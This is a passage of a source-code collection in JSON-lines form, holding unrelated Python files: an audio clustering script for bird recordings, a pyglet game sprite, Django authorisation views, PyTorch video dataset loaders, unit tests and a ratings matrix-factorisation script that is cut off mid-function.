'Transient')\n\n#===============================================================================\n# save the state of the model :\n# FIXME: the savevars method will work for small problems, but fails without \n# error for large ones.\nim.savevars(out_dir + name + '.md', 'md', md)\n\nvar_dict = {'md.results.TransientSolution' : md.results.TransientSolution}\nim.savevars(out_dir + name + '.shelve', var_dict)\n\n\n\n","sub_path":"simulations/mismip/issm/mismip.py","file_name":"mismip.py","file_ext":"py","file_size_in_byte":10503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488136260","text":"import pandas as pd\r\nimport numpy as np\r\nimport soundfile as sf\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom scipy import fft\r\nfrom scipy.fftpack import dct\r\nimport math\r\nimport librosa, librosa.display\r\nimport scipy.io.wavfile\r\n\r\n\r\n\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.cluster import DBSCAN\r\nfrom collections import Counter\r\nfrom sklearn.manifold import TSNE\r\n\r\n\r\n\r\ndef frequency_sepectrum(x, sf):\r\n \"\"\"\r\n Derive frequency spectrum of a signal from time domain\r\n :param x: signal in the time domain\r\n :param sf: sampling frequency\r\n :returns frequencies and their content distribution\r\n \"\"\"\r\n x = x - np.average(x) # zero-centering\r\n\r\n n = len(x)\r\n k = np.arange(n)\r\n tarr = n / float(sf)\r\n frqarr = k / float(tarr) # two sides frequency range\r\n\r\n frqarr = frqarr[range(n // 2)] # one side frequency range\r\n\r\n x = np.fft.fft(x) / n # fft computing and normalization\r\n x = x[range(n // 2)]\r\n\r\n return frqarr, 
abs(x)\r\n\r\n\r\n\"\"\"\r\n#matplotlib inline\r\nrcParams('figure.figsize') = 5, 4\r\nsb.set_style 'whitegrid'\r\n\"\"\"\r\n\r\n\"\"\"\r\nObtaining Paths\r\n\"\"\"\r\npath_to_data = 'F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned'\r\ndays = [14, 15, 16, 18, 19]\r\n\r\n#Choose which file type you want to extract\r\nwanted_file = 'DAQmxChannels'\r\n\r\n#Make list of all the file paths for later use\r\nfile_paths = []\r\nfor d in days:\r\n path_to_data = 'F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned'\r\n path_to_data = path_to_data + '/2018-08-{}'.format(d)\r\n for f in os.listdir(path_to_data):\r\n if f.rfind(wanted_file) != -1:\r\n file_paths.append(path_to_data + '/' + f)\r\n\r\n#print(np.asarray(file_paths))\r\n\r\n\"\"\"\r\nExtract Audio and Sampling Rate\r\n\"\"\"\r\n#start_point = 16\r\n#end_point = 19\r\nstart_point = 980\r\nend_point = 1010\r\naudio, sr = sf.read('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_DAQmxChannels.w64')\r\n#audio, sr = sf.read('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_SdrChannels.w64')\r\naudio = audio[int(start_point*sr):int(end_point * sr)]\r\n\r\nprint('Sampling Rate: ', sr)\r\nprint('Audio shape: ', audio.shape)\r\n\r\n\"\"\"\r\nSimple Audio and Frequency Plot\r\n\"\"\"\r\nt = np.arange(len(audio)) / float(sr)\r\nplt.subplot(2, 1, 1)\r\nplt.plot(t, audio)\r\nplt.xlabel('t')\r\nplt.ylabel('y')\r\n\"\"\"\r\nfrq, X = frequency_sepectrum(audio, sr)\r\n\r\nplt.subplot(2, 1, 2)\r\nplt.plot(frq, X, 'b')\r\nplt.xlabel('Freq (Hz)')\r\nplt.ylabel('|X(freq)|')\r\nplt.tight_layout()\r\n\"\"\"\r\nplt.show()\r\n\r\n\r\n\"\"\"\r\nMFCC and Filter Bank Features\r\n\"\"\"\r\n\"\"\"\r\n#pre emphasis audio signal\r\npre_emphasis = 0.97\r\nemphasized_audio = np.append(audio[0], audio[1:] - pre_emphasis * audio[:-1])\r\nprint(emphasized_audio.shape)\r\n#produce frames\r\nframe_size = 0.025\r\nframe_stride = 0.01\r\nframe_length, frame_step = frame_size * sr, frame_stride * sr # Convert from seconds to samples\r\nsignal_length = len(emphasized_audio)\r\nframe_length = int(round(frame_length))\r\nframe_step = int(round(frame_step))\r\nnum_frames = int(np.ceil(float(np.abs(signal_length - frame_length)) / frame_step)) # Make sure that we have at least 1 frame\r\nnum_frames=num_frames+3\r\nprint(num_frames)\r\npad_signal_length = num_frames * frame_step + frame_length\r\nprint(pad_signal_length)\r\nz = np.zeros((pad_signal_length - signal_length))\r\npad_signal = np.append(emphasized_audio, z) # Pad Signal to make sure that all frames have equal number of samples without truncating any samples from the original signal\r\n\r\nindices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T\r\nframes = pad_signal[indices.astype(np.int32, copy=False)]\r\n#Apply window\r\nframes *= np.hamming(frame_length)\r\n#Fourier Transform\r\nNFFT = 512\r\nmag_frames = np.absolute(np.fft.rfft(frames, NFFT)) # Magnitude of the FFT\r\npow_frames = ((1.0 / NFFT) * ((mag_frames) ** 2)) # Power Spectrum\r\n#Filter Bank\r\nnfilt = 40\r\nlow_freq_mel = 0\r\nhigh_freq_mel = (2595 * np.log10(1 + (sr / 2) / 700)) # Convert Hz to Mel\r\nmel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2) # Equally spaced in Mel scale\r\nhz_points = (700 * (10**(mel_points / 2595) - 1)) # Convert Mel to Hz\r\nbin = np.floor((NFFT + 1) * hz_points / sr)\r\n\r\nfbank = 
np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\nfor m in range(1, nfilt + 1):\r\n f_m_minus = int(bin[m - 1]) # left\r\n f_m = int(bin[m]) # center\r\n f_m_plus = int(bin[m + 1]) # right\r\n\r\n for k in range(f_m_minus, f_m):\r\n fbank[m - 1, k] = (k - bin[m - 1]) / (bin[m] - bin[m - 1])\r\n for k in range(f_m, f_m_plus):\r\n fbank[m - 1, k] = (bin[m + 1] - k) / (bin[m + 1] - bin[m])\r\nfilter_banks = np.dot(pow_frames, fbank.T)\r\nfilter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # Numerical Stability\r\nfilter_banks = 20 * np.log10(filter_banks) # dB\r\n#MFCC\r\nnum_ceps = 20\r\nmfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 1 : (num_ceps + 1)] # Keep 2-13\r\n\r\n#sinusoidal filtering\r\n\r\n#(nframes, ncoeff) = mfcc.shape\r\n#n = np.arange(ncoeff)\r\n#lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n#mfcc *= lift #*\r\n\r\n#Mean normalisation\r\nfilter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\nmfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\nprint(\"MFCC shape = \",mfcc.shape)\r\nprint(\"Filter_banks = \",filter_banks.shape)\r\n\r\nplt.imshow(mfcc.T, aspect='auto', origin='lower', interpolation='none', cmap=plt.cm.jet)\r\nplt.title(\"MFCCs in frames\")\r\nplt.show()\r\nplt.imshow(filter_banks.T, aspect='auto', origin='lower', interpolation='none', cmap=plt.cm.jet)\r\nplt.title(\"Filter_banks in frames\")\r\nplt.show()\r\n\"\"\"\r\n\"\"\"\r\nLibrosa\r\n\"\"\"\r\n\r\n\"\"\"\r\nLoad Audio\r\n\"\"\"\r\naudio_librosa, sr_librosa = librosa.load('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_DAQmxChannels.w64', sr = None)\r\n#audio_librosa, sr_librosa = librosa.load('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_SdrChannels.w64', sr = None)\r\naudio_librosa = audio_librosa[int(start_point*sr_librosa):int(end_point*sr_librosa)]\r\nprint(sr_librosa)\r\nprint(audio_librosa.shape)\r\n\r\n\"\"\"\r\nSopectrum\r\n\"\"\"\r\nspectrum = librosa.core.stft(audio_librosa, n_fft=int(0.025*sr_librosa), hop_length=int(0.010*sr_librosa))\r\nabsolute_value = np.abs(spectrum)\r\nprint(absolute_value.shape)\r\n\"\"\"\r\nMFCC\r\n\"\"\"\r\n#\"\"\"\r\nmfcc_librosa = librosa.feature.mfcc(S=absolute_value, sr=sr_librosa)\r\nprint(\"Librosa_mfcc = \",mfcc_librosa.shape)\r\nplt.figure(figsize=(10, 4))\r\nlibrosa.display.specshow(mfcc_librosa, x_axis='time', cmap=plt.cm.jet)\r\nplt.colorbar()\r\nplt.title('MFCC')\r\nplt.tight_layout()\r\nplt.show()\r\n#\"\"\"\r\n\"\"\"\r\nChroma Feature\r\n\"\"\"\r\nchromagram = librosa.feature.chroma_stft(S=absolute_value, sr=sr_librosa)\r\nplt.figure(figsize=(15, 5))\r\nlibrosa.display.specshow(chromagram, x_axis='time', y_axis='chroma', hop_length=512, cmap='coolwarm')\r\nplt.show()\r\nprint(\"Chromogram = \",chromagram.shape)\r\n\"\"\"\r\nRoll-off\r\n\"\"\"\r\nroll_off=librosa.feature.spectral_rolloff(S=absolute_value, sr=sr_librosa)\r\nprint(\"Roll_off = \", roll_off.shape)\r\n\"\"\"\r\nCentroid\r\n\"\"\"\r\ncentroid=librosa.feature.spectral_centroid(S=absolute_value, sr=sr_librosa)\r\nprint(\"Centroid = \", centroid.shape)\r\n\"\"\"\r\nRMS Energy\r\n\"\"\"\r\nif(sr_librosa==32000):\r\n frame_len = 800\r\nelif(sr_librosa==24000):\r\n frame_len = 600\r\nrms = librosa.feature.rms(S=absolute_value, frame_length=frame_len)\r\nprint(\"RMSE = \", rms.shape)\r\nlibrosa.display.specshow(rms, x_axis='time', y_axis='chroma', hop_length=512, cmap='coolwarm')\r\nplt.show()\r\n\"\"\"\r\nNormalize features\r\n\"\"\"\r\nmfcc = 
StandardScaler().fit_transform(mfcc_librosa)\r\nprint(np.mean(mfcc), np.std(mfcc))\r\nchromagram = StandardScaler().fit_transform(chromagram)\r\nprint(np.mean(chromagram), np.std(chromagram))\r\n\"\"\"\r\nConcatinate features\r\n\"\"\"\r\n#total_features = np.concatenate((mfcc.T, chromagram, roll_off, centroid), axis=0)\r\ntotal_features = np.concatenate((mfcc.T, chromagram.T, roll_off.T, centroid.T, rms.T), axis=1)\r\nprint(total_features.shape)\r\n\"\"\"\r\n\"\"\"\r\n#PCA for 2D Cluster Plot\r\n\"\"\"\r\npca_features_db = PCA(n_components=20)\r\nprincipalcomp_db = pca_features_db.fit_transform(total_features)\r\nprint(principalcomp_db.shape)\r\n\"\"\"\r\n\"\"\"\r\nFinding eps\r\n\"\"\"\r\nnbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree').fit(total_features)\r\ndistances, indices = nbrs.kneighbors(total_features)\r\nmean_dist = distances.mean()\r\nprint(distances)\r\nprint(mean_dist)\r\ndistances = np.sort(distances, axis=0)\r\ndistances = distances[:,1]\r\nplt.plot(distances)\r\nplt.show()\r\n\r\n\"\"\"\r\nDBScan\r\n\"\"\"\r\nmodel = DBSCAN(eps=81., min_samples=33)\r\nmodel.fit(total_features)\r\n\r\nprint(model.labels_)\r\nprint(model.labels_.shape)\r\ndbscan_dict = Counter(model.labels_)\r\n\r\n\"\"\"\r\nExpand Labels to Audio Size\r\n\"\"\"\r\nexpanded_db_coeff = np.empty(len(audio))\r\nindex = 0\r\nfor i in range(len(model.labels_)):\r\n for x in range(int(len(audio)/len(mfcc_librosa.T))-1):\r\n expanded_db_coeff[index]=model.labels_[i]\r\n index+=1\r\nprint(expanded_db_coeff.shape)\r\n\r\n\"\"\"\r\nPCA for 2D Cluster Plot\r\n\"\"\"\r\npca_features = PCA(n_components=2)\r\nprincipalcomp = pca_features.fit_transform(total_features)\r\nprint(principalcomp.shape)\r\n\"\"\"\r\n\"\"\"\r\n#2D Cluster Plot PCA\r\n\"\"\"\r\nplt.figure()\r\nplt.figure(figsize=(10,10))\r\nplt.xticks(fontsize=12)\r\nplt.yticks(fontsize=14)\r\nplt.xlabel('Principal Component - 1',fontsize=20)\r\nplt.ylabel('Principal Component - 2',fontsize=20)\r\nplt.title(\"Principal Component Analysis\",fontsize=20)\r\nfor index in range(len(model.labels_)):\r\n if(model.labels_[index]==-1):\r\n plt.scatter(principalcomp[index, 0], principalcomp[index, 1], color='red', s=50)\r\n else:\r\n plt.scatter(principalcomp[index, 0], principalcomp[index, 1], color='blue', s=50)\r\nplt.show()\r\n\"\"\"\r\n\"\"\"\r\nTSNE for 2D Cluster Plot\r\n\"\"\"\r\ntsne_features = TSNE(n_components=2)\r\ntsnefit = tsne_features.fit_transform(total_features)\r\nprint(tsnefit.shape)\r\n\"\"\"\r\n\"\"\"\r\n#2D Cluster Plot TSNE\r\n\"\"\"\r\nplt.figure()\r\nplt.figure(figsize=(10,10))\r\nplt.xticks(fontsize=12)\r\nplt.yticks(fontsize=14)\r\nplt.xlabel('TSNE Component - 1',fontsize=20)\r\nplt.ylabel('TSNE Component - 2',fontsize=20)\r\nplt.title(\"TSNE Component Analysis\",fontsize=20)\r\nfor index in range(len(model.labels_)):\r\n if(model.labels_[index]==-1):\r\n plt.scatter(tsnefit[index, 0], tsnefit[index, 1], color='red', s=50)\r\n else:\r\n plt.scatter(tsnefit[index, 0], tsnefit[index, 1], color='blue', s=50)\r\nplt.show()\r\n\"\"\"\r\nplt.scatter(principalcomp[:,0], principalcomp[:,1], c=model.labels_, cmap=plt.cm.jet)\r\nplt.show()\r\nplt.scatter(tsnefit[:,0], tsnefit[:,1], c=model.labels_, cmap=plt.cm.jet)\r\nplt.show()\r\n\r\n\"\"\"\r\nLabeled Audio\r\n\"\"\"\r\nplt.scatter(t,audio,c=expanded_db_coeff, linestyle='-', linewidths=0.5)\r\nplt.show()\r\nprint(dbscan_dict)\r\ndbscan_keys = list(dbscan_dict.keys())\r\nprint(dbscan_keys)\r\n\r\n\"\"\"\r\n#Audio Snippets for check\r\n\"\"\"\r\nfor i in range(len(dbscan_keys)):\r\n value = 
dbscan_keys[i]\r\n audio_title = 'audio_snippet_' + str(value) +'.wav'\r\n print(audio_title)\r\n audio_snippet = np.empty(len(audio))\r\n for x in range(len(expanded_db_coeff)):\r\n if(expanded_db_coeff[x]==value):\r\n audio_snippet[x] = audio_librosa[x]\r\n else:\r\n audio_snippet[x] = 0\r\n audio_path = 'F:/Neural Systems Project/Code/DBScan/Output/' + audio_title\r\n librosa.output.write_wav(audio_path, audio_snippet, sr_librosa)\r\n\r\n\r\n","sub_path":"main/DBScan.py","file_name":"DBScan.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466918859","text":"import pyglet\nfrom system.component import Component\nimport config\n\nclass Ball(Component):\n\n def __init__(self, *args, **kwargs):\n super(Ball, self).__init__(*args,**kwargs)\n self.speed = kwargs.get('speed', 5)\n self.ball_image = pyglet.image.load('assets\\\\ball.png')\n self.width = self.ball_image.width\n self.height = self.ball_image.height\n self.ball_sprite = pyglet.sprite.Sprite(self.ball_image,self.x,self.y)\n self.x_direction = 1\n self.y_direction = 1\n\n print(\"Ball Created!\")\n\n def update_self(self):\n\n self.x += (self.speed * self.x_direction)\n self.y += (self.speed * self.y_direction)\n self.ball_sprite.set_position(self.x,self.y)\n\n if(self.x < 0 or (self.x + self.width) > config.window_width):\n self.x_direction *= -1\n\n if(self.y < 0 or (self.y + self.width) > config.window_height):\n self.y_direction *= -1\n\n def draw_self(self):\n self.ball_sprite.draw()\n","sub_path":"pyglet-tutorials/pyglet-game-tutorial/entities/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472290456","text":"import time\n\n\ndef calc(results):\n for line in results:\n time.sleep(1)\n yield len(line)\n\n\ndef gen_count_line(f):\n results = []\n for line in f:\n results.append(line)\n return calc(results)\n\n\ndef call_in_with():\n with open('README.md') as f:\n results = gen_count_line(f)\n print('1:', time.time())\n print(results)\n print('2:', time.time())\n for i in results:\n print(i)\n print('3:', time.time())\n\n\nif __name__ == '__main__':\n call_in_with()\n","sub_path":"17-futures/my_demo.py","file_name":"my_demo.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204131660","text":"import datetime, time\nimport pytimber\nfrom numpy import *\nfrom pytimber.pagestore import *\n\ndb=pytimber.LoggingDB()\n\ndata1=db.get('LHC.BOFSU:BPM_CAL_MAPPING_ERRORS',time.time()-3600*24*30,time.time())\n\nprint([v.dtype for v in data1.values()[0][1]])\n\ndata2=db.get(['CPS.TGM:USER'], datetime.datetime(2016,8,3,8), 
datetime.datetime(2016,8,3,8,20))\n\nprint(data2.values()[0][1].dtype)\n\ndb=PageStore('test.db','testdata')\n\nname='var'\nidx=range(3)\nrec=['123','232','123']\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=['123','232','333123441']\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=array(['123','232','333'],dtype='U')\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=[['123','123412'],['232','4241','fdasfa'],['333','434123']]\n\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\ndb.delete()\n","sub_path":"tests/test_string.py","file_name":"test_string.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105134292","text":"from django.shortcuts import render\r\nfrom django.views.decorators.http import require_POST\r\nfrom django.http import JsonResponse\r\nfrom django.forms import ModelForm\r\nfrom django.db.models import Q\r\nimport logging\r\nfrom common.service.util import field_names, get_form_error_msg\r\nfrom common.forms import GridSearchForm, GridDeleteForm\r\nfrom auth.models import AuthResult\r\nfrom auth.permission import permission_required\r\nfrom auth.service.authresult import AuthResultService\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@permission_required('auth.result_view')\r\ndef result_search(request):\r\n    return render(request, 'auth/result.html')\r\n\r\n\r\n@require_POST\r\n@permission_required('auth.result_view')\r\ndef result_list_data(request):\r\n    try:\r\n        search_form = GridSearchForm(request.POST)\r\n        start, limit, sort_property, sort_direction = search_form.get_search_data()\r\n        result_query = AuthResult.objects.all()\r\n        # extra filters here\r\n        result_query = result_query.values('app__app_name', 'res_label', 'resource__res_name', 'user__login_name', 'user__nick_name', 'group__group_code', 'group__group_name')\r\n        if sort_property is not None:\r\n            result_query = result_query.order_by(sort_direction + sort_property)\r\n        total_count = result_query.count()\r\n        result_list = list(result_query[start: start + limit])\r\n        return JsonResponse({'total': total_count, 'rows': result_list})\r\n    except Exception as exp:\r\n        logger.exception(exp)\r\n        return JsonResponse({'success': False, 'message': 'Failed to load data! Details: %s' % exp})\r\n\r\n\r\n@require_POST\r\n@permission_required('auth.result_regenerate')\r\ndef result_regenerate(request):\r\n    try:\r\n        auth_result_service = AuthResultService()\r\n        auth_result_service.refresh_all_result()\r\n        return JsonResponse({'success': True, 'message': 'Regeneration succeeded!'})\r\n    except Exception as exp:\r\n        logger.exception(exp)\r\n        return JsonResponse({'success': False, 'message': 'Regeneration failed! Details: %s' % exp})\r\n","sub_path":"auth/views/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210989483","text":"import glob\nimport random\nimport torch\nimport os.path as op\nimport numpy as np\nfrom cv2 import cv2\nfrom torch.utils import data as data\nfrom utils import FileClient, paired_random_crop, augment, totensor, import_yuv\n\n\ndef _bytes2img(img_bytes):\n    img_np = np.frombuffer(img_bytes, np.uint8)\n    img = np.expand_dims(cv2.imdecode(img_np, cv2.IMREAD_GRAYSCALE), 2)  # (H W 1)\n    img = img.astype(np.float32) / 255.\n    return img\n\n\nclass Vimeo90KDataset(data.Dataset):\n    \"\"\"Vimeo-90K dataset.\n\n    For training data: LMDB is adopted. 
See create_lmdb for details.\n \n Return: A dict includes:\n img_lqs: (T, [RGB], H, W)\n img_gt: ([RGB], H, W)\n key: str\n \"\"\"\n def __init__(self, opts_dict, radius):\n super().__init__()\n\n self.opts_dict = opts_dict\n \n # dataset paths\n self.gt_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['gt_path']\n )\n self.lq_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['lq_path']\n )\n\n # extract keys from meta_info.txt\n self.meta_info_path = op.join(\n self.gt_root, \n 'meta_info.txt'\n )\n with open(self.meta_info_path, 'r') as fin:\n self.keys = [line.split(' ')[0] for line in fin]\n\n # define file client\n self.file_client = None\n self.io_opts_dict = dict() # FileClient needs\n self.io_opts_dict['type'] = 'lmdb'\n self.io_opts_dict['db_paths'] = [\n self.lq_root, \n self.gt_root\n ]\n self.io_opts_dict['client_keys'] = ['lq', 'gt']\n\n # generate neighboring frame indexes\n # indices of input images\n # radius | nfs | input index\n # 0 | 1 | 4, 4, 4 # special case, for image enhancement\n # 1 | 3 | 3, 4, 5\n # 2 | 5 | 2, 3, 4, 5, 6 \n # 3 | 7 | 1, 2, 3, 4, 5, 6, 7\n # no more! septuplet sequences!\n if radius == 0:\n self.neighbor_list = [4, 4, 4] # always the im4.png\n else:\n nfs = 2 * radius + 1\n self.neighbor_list = [i + (9 - nfs) // 2 for i in range(nfs)]\n\n def __getitem__(self, index):\n if self.file_client is None:\n self.file_client = FileClient(\n self.io_opts_dict.pop('type'), **self.io_opts_dict\n )\n # random reverse\n if self.opts_dict['random_reverse'] and random.random() < 0.5:\n self.neighbor_list.reverse()\n\n # ==========\n # get frames\n # ==========\n\n # get the GT frame (im4.png)\n gt_size = self.opts_dict['gt_size']\n key = self.keys[index]\n clip, seq, _ = key.split('/') # key example: 00001/0001/im1.png\n\n img_gt_path = key\n img_bytes = self.file_client.get(img_gt_path, 'gt')\n img_gt = _bytes2img(img_bytes) # (H W 1)\n\n # get the neighboring LQ frames\n img_lqs = []\n for neighbor in self.neighbor_list:\n img_lq_path = f'{clip}/{seq}/im{neighbor}.png'\n img_bytes = self.file_client.get(img_lq_path, 'lq')\n img_lq = _bytes2img(img_bytes) # (H W 1)\n img_lqs.append(img_lq)\n\n # ==========\n # data augmentation\n # ==========\n \n # randomly crop\n img_gt, img_lqs = paired_random_crop(\n img_gt, img_lqs, gt_size, img_gt_path\n )\n\n # flip, rotate\n img_lqs.append(img_gt) # gt joint augmentation with lq\n img_results = augment(\n img_lqs, self.opts_dict['use_flip'], self.opts_dict['use_rot']\n )\n\n # to tensor\n img_results = totensor(img_results)\n img_lqs = torch.stack(img_results[0:-1], dim=0)\n img_gt = img_results[-1]\n\n return {\n 'lq': img_lqs, # (T [RGB] H W)\n 'gt': img_gt, # ([RGB] H W)\n }\n\n def __len__(self):\n return len(self.keys)\n\n\nclass VideoTestVimeo90KDataset(data.Dataset):\n \"\"\"\n Video test dataset for Vimeo-90K.\n\n For validation data: Disk IO is adopted.\n \n Only test the center frame.\n \"\"\"\n def __init__(self, opts_dict, radius):\n super().__init__()\n\n assert radius != 0, \"Not implemented!\"\n \n self.opts_dict = opts_dict\n\n # dataset paths\n self.gt_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['gt_path']\n )\n self.lq_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['lq_path']\n )\n self.meta_info_path = op.join(\n 'data/vimeo90k/', \n self.opts_dict['meta_path']\n )\n \n # record data info for loading\n self.data_info = {\n 'lq_path': [],\n 'gt_path': [],\n 'gt_index': [], \n 'lq_indexes': [], \n 'h': [], \n 'w': [], \n 'index_vid': [], \n 'name_vid': [], \n }\n\n gt_path_list 
= []\n meta_fp = open(self.meta_info_path, 'r')\n while True:\n new_line = meta_fp.readline().split('\\n')[0]\n if new_line == '':\n break\n vid_name = new_line.split('/')[0] + '_' + new_line.split('/')[1]\n gt_path = op.join(\n self.gt_root, vid_name + '.yuv'\n )\n gt_path_list.append(gt_path)\n \n self.vid_num = len(gt_path_list)\n for idx_vid, gt_vid_path in enumerate(gt_path_list):\n name_vid = gt_vid_path.split('/')[-1]\n w, h = 448, 256\n lq_vid_path = op.join(\n self.lq_root,\n name_vid\n )\n lq_indexes = list(range(0, 7))\n self.data_info['index_vid'].append(idx_vid)\n self.data_info['gt_path'].append(gt_vid_path)\n self.data_info['lq_path'].append(lq_vid_path)\n self.data_info['name_vid'].append(name_vid)\n self.data_info['w'].append(w)\n self.data_info['h'].append(h)\n self.data_info['gt_index'].append(3)\n self.data_info['lq_indexes'].append(lq_indexes)\n\n def __getitem__(self, index):\n # get gt frame\n img = import_yuv(\n seq_path=self.data_info['gt_path'][index], \n yuv_type='444p', \n h=self.data_info['h'][index],\n w=self.data_info['w'][index],\n tot_frm=1,\n start_frm=self.data_info['gt_index'][index],\n only_y=True\n )\n img_gt = np.expand_dims(\n np.squeeze(img), 2\n ).astype(np.float32) / 255. # (H W 1)\n\n # get lq frames\n img_lqs = []\n for lq_index in self.data_info['lq_indexes'][index]:\n img = import_yuv(\n seq_path=self.data_info['lq_path'][index], \n yuv_type='444p', \n h=self.data_info['h'][index],\n w=self.data_info['w'][index],\n tot_frm=1,\n start_frm=lq_index,\n only_y=True\n )\n img_lq = np.expand_dims(\n np.squeeze(img), 2\n ).astype(np.float32) / 255. # (H W 1)\n img_lqs.append(img_lq)\n\n # no any augmentation\n\n # to tensor\n img_lqs.append(img_gt)\n img_results = totensor(img_lqs)\n img_lqs = torch.stack(img_results[0:-1], dim=0)\n img_gt = img_results[-1]\n\n return {\n 'lq': img_lqs, # (T 1 H W)\n 'gt': img_gt, # (1 H W)\n 'name_vid': self.data_info['name_vid'][index], \n 'index_vid': self.data_info['index_vid'][index], \n }\n\n def __len__(self):\n return len(self.data_info['gt_path'])\n\n def get_vid_num(self):\n return self.vid_num\n","sub_path":"dataset/vimeo90k.py","file_name":"vimeo90k.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130007580","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom patchwork.feature._multitask import _encode_classes, _dataframe_to_classes\nfrom patchwork.feature._multitask import _assemble_full_network\n\n\ndef test_encode_classes():\n train = pd.Series([\"foo\", \"bar\", \"bar\", np.nan])\n val = pd.Series([\"bar\", \"bar\"])\n \n train_ind, val_ind, classes = _encode_classes(train, val)\n \n assert len(classes) == 2\n for c in [\"foo\", \"bar\"]:\n assert c in classes\n assert train_ind.shape[0] == len(train)\n assert val_ind.shape[0] == len(val)\n assert -1 in train_ind\n assert -1 not in val_ind\n \n \ndef test_dataframe_to_classes():\n train = pd.DataFrame({\n \"filepath\":[\"foo.png\", \"bar.png\", \"foobar.png\"],\n \"class0\":[\"a\", \"b\", \"c\"],\n \"class1\":[\"x\", \"y\", np.nan]\n })\n val = pd.DataFrame({\n \"filepath\":[\"foo1.png\", \"bar2.png\"],\n \"class0\":[\"a\", \"b\"],\n \"class1\":[\"x\", \"y\"]\n })\n outdict, class_dict = _dataframe_to_classes(train, val,\n [\"class0\", \"class1\"])\n \n assert len(outdict[\"train_files\"]) == len(train)\n assert len(outdict[\"val_files\"]) == len(val)\n \n assert outdict[\"train_indices\"].shape == 
(len(train),2)\n assert outdict[\"val_indices\"].shape == (len(val),2)\n assert -1 in outdict[\"train_indices\"]\n assert -1 not in outdict[\"val_indices\"]\n \n \ndef test_assemble_full_network():\n inpt = tf.keras.layers.Input((None, None, 3))\n net = tf.keras.layers.Conv2D(5, 3)(inpt)\n fcn = tf.keras.Model(inpt, net)\n \n task_dimensions = [2,3,4]\n model_dict, trainvars = _assemble_full_network(fcn,\n task_dimensions,\n shared_layers=[3,5],\n task_layers=[7,\"p\",11],\n train_fcn=False,\n global_pooling=\"max\")\n \n assert model_dict[\"fcn\"] is fcn\n assert len(model_dict[\"full\"].outputs) == 3\n for o,d in zip(model_dict[\"full\"].outputs, task_dimensions):\n assert o.shape[-1] == d\n assert isinstance(trainvars, list)","sub_path":"patchwork/tests/test_feature_multitask.py","file_name":"test_feature_multitask.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96899628","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.genfromtxt('ratings.csv', delimiter=\",\")\n\n# not using timestamp\nX = np.delete(data[1:], 3, axis=1)\nprint(X.shape)\nprint(X)\nprint(np.amax(X[:, 1]))\nprint('max min rating: ', np.amax(X[:, 2]), np.amin(X[:, 2]))\n\n\nsort_objects = np.unique(X[:, 1])\nsort_users = np.unique(X[:, 0])\n\nfor i in range(X.shape[0]):\n X[i, 0] = np.where(sort_users == int(X[i, 0]))[0][0]\n X[i, 1] = np.where(sort_objects == int(X[i, 1]))[0][0]\n\nprint(X.shape)\nprint(X)\n# user and object max ids\nuser_max = int(np.amax(X[:, 0])) # user max index\nobject_max = int(np.amax(X[:, 1])) # object max index\nprint('Max user id: ', user_max)\nprint('Max movie id: ', object_max)\n\n\n#shuffling data\nnp.random.shuffle(X)\nprint(X)\nprint(X.shape)\n\n#setting train, val, test sets\nX_train = X[:60000]\nX_val = X[60000:80000]\nX_test = X[80000:]\nprint(X_train.shape, X_val.shape, X_test.shape)\n\ndef check_error(X, u, v):\n\n err = 0\n N = X.shape[0]\n for k in range(N):\n user_id = int(X[k, 0])\n object_id = int(X[k, 